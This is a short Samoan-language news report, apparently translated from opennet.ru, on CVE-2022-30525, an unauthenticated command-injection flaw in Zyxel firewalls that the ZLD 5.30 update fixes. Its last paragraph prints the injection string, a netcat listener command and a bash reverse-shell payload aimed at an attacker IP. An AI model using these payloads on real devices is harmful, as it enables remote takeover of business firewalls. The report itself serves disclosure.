O se faʻafitauli matuia (CVE-2022-30525) ua faʻaalia i masini Zyxel o le ATP, VPN ma le USG FLEX faʻasologa, ua fuafuaina e faʻatulagaina le faʻaogaina o pa puipui, IDS ma VPN i pisinisi, lea e mafai ai e se tagata osofaʻi fafo ona faʻatinoina le tulafono i luga o le masini e aunoa ma aia tatau a tagata e aunoa ma le faʻamaonia. Ina ia faia se osofaʻiga, e tatau i le tagata osofaʻi ona mafai ona tuʻuina atu talosaga i le masini e faʻaaoga ai le HTTP / HTTPS protocol. Ua faʻamautu e Zyxel le faʻafitauli i le ZLD 5.30 firmware update. E tusa ai ma le auaunaga a Shodan, o loʻo i ai i le taimi nei 16213 masini faʻaletonu i luga o le upega tafaʻilagi o le lalolagi e talia talosaga e ala i HTTP / HTTPS.
O lo'o fa'atinoina le fa'agaioiga e ala i le tu'uina atu o fa'atonuga fa'apitoa i le 'upega tafa'ilagi /ztp/cgi-bin/handler, e mafai ona maua e aunoa ma le fa'amaoni. O le faʻafitauli e mafua mai i le leai o se faʻamamaina lelei o faʻasologa o talosaga pe a faʻatinoina poloaiga i luga o le faiga e faʻaaoga ai le os.system telefoni faʻaaogaina i le faletusi lib_wan_settings.py ma faʻataunuʻuina pe a faʻagasolo le faʻaogaina o le setWanPortSt.
Mo se faʻataʻitaʻiga, e mafai e se tagata osofaʻi ona pasi le manoa "; ping 192.168.1.210;" lea o le a taitai atu ai i le faatinoga o le "ping 192.168.1.210" poloaiga i luga o le faiga. Ina ia maua le avanoa i le atigi poloaiga, e mafai ona e tamoe "nc -lvnp 1270" i luga o lau masini, ona amata lea o se fesoʻotaʻiga faʻasolosolo e ala i le lafoina o se talosaga i le masini ma le '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
puna: opennet.ru